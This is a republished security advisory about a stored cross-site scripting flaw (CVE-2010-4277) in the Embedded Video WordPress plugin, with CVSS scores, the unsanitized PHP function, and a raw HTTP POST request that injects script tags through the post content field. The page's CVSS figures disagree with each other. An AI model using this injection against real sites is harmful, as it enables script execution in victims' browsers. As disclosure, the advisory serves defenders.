Embedded Video WordPress Plugin Cross Site Vulnerability (XSS)

2010.12.25
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Embedded Video WordPress Plugin Cross Site Scripting Vulnerability CVE-2010-4277 INTRODUCTION Embedded Video is a WordPress Plugin created by Jovel Stefan to easily embedded videos in blog posts. The videos can be uploaded to the web server or come from external portals (like YouTube, Google Video and others). Links to the video on the video portal or for download of the video can be automatically generated as well. The linktext is also configurable individually. Furthermore a fixed prefix for the linktext can be determined. The videos can be integrated easily by using the built-in WYSIWYG editor. The plugin has a Cross Site Script (XSS) vulnerability. This problem was confirmed in the latest version of the plugin, other versions maybe also affected. The developer of the replied to the advisory in a very responsible and fast manner, but unfortunately, there will be no updates due to the fact that this plugin is not maintained anymore. CVSS Scoring System The CVSS score is: 6.4 Base Score: 6.7 Temporal Score: 6.4 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N Temporal score is: E:F/RL:U/RC:C DETAILS The file lembedded-video.php does not sanitize content variable, it is possible to inject malformed data by Javascript. Code affected: function embeddedvideo_plugin($content) { $output = preg_replace_callback(REGEXP_1, 'embeddedvideo_plugin_callback', $content); $output = preg_replace_callback(REGEXP_2, 'embeddedvideo_plugin_callback', $output); $output = preg_replace_callback(REGEXP_3, 'embeddedvideo_plugin_callback', $output); return ($output); } Request: http://<server>/wordpress/wp-admin/post.php POST /wordpress/wp-admin/post.php HTTP/1.1 Host: <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://<server>/wordpress/wp-admin/post.php?post=8&action=edit&message=1 C o o k i e : w o r d p r e s s _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n %7C1290110435%7C7f9fa1a66aec0259906ea15086aea0c8; wp-settings-time-1=1289940308; w o r d p r e s s _ t e s t _ c o o k i e = W P + C o o k i e + c h e c k ; w o r d p r e s s _ l o g g e d _ i n _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n %7C1290110435%7C68b064d813dd8bfaa5d2d2cdf757848e; wp-settings-1=m1%3Do %26m6%3Dc%26m7%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 1786 _wpnonce=b2bc367f9c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php% 3Fpost % 3 D 8 % 2 6 a c t i o n % 3 D e d i t % 2 6 m e s s a g e %3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&pos t_type=post&original_ post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-a dmin %2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A %2F %2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action % 3 D e d i t & p o s t _ I D = 8 & a u t o s a v e n o n c e = 9 6 2 9 3 9 1 7 c 9 & m e t a - b o x - o r d e r - n o n c e = c 2 f e 5 5 3 5 c 4 & c l o s e d p o s t b o x e s n o n c e = b a d 9 d c 7 7 5 b & w p - preview=&hidden_post_status=publish&post_status=publish&hidden_post_pass word=&hidden_post_v isibility=public&visibility=public&post_password=&mm=11&jj=17&aa=2010&hh =00&mn=05&ss=33&hi dden_mm=11&cur_mm=11&hidden_jj=17&cur_jj=17&hidden_aa=2010&cur_aa=2010&h idden_hh=00 &cur_hh=00&hidden_mn=05&cur_mn=36&original_publish=Update&save=Update&po st_category % 5 B % 5 D = 0 & p o s t _ c a t e g o r y % 5 B % 5 D = 1 & n e w c a t e g o r y = N e w + C a t e g o r y +Name&newcategory_parent=-1&_ajax_nonce-add-category=62352e38f5&tax_inpu t%5Bpost_tag % 5 D = & n e w t a g % 5 B p o s t _ t a g %5D=&post_title=testando&samplepermalinknonce=4a0d9c8491&content=%5Byout ube+%3Cscript +type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert %281%29%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E+%3Cscript+type%3D%22text %2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert%282%29%0D%0A%2F %2F+%5D%5D%3E%3C%2Fscript%3E%5D&excerpt=&trackback_url=&meta%5B6%5D%5Bke y %5D=_edit_last&_ajax_nonce=5453d93de8&meta%5B6%5D%5Bvalue%5D=1&meta%5B9% 5D %5Bkey%5D=_edit_lock&_ajax_nonce=5453d93de8&meta%5B9%5D%5Bvalue %5D=1289954192&meta%5B8%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=5453d93de8& meta % 5 B 8 % 5 D % 5 B v a l u e % 5 D = & m e t a k e y i n p u t = & m e t a v a l u e = & _ a j a x _ n o n c e - a d d - meta=9453fa7f77&advanced_view=1&comment_status=open&ping_status=open&pos t_name=testan do&post_author_override=1 CREDITS This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense

References:

http://xforce.iss.net/xforce/xfdb/64214
http://www.securityfocus.com/bid/45486
http://www.securityfocus.com/archive/1/archive/1/515345/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top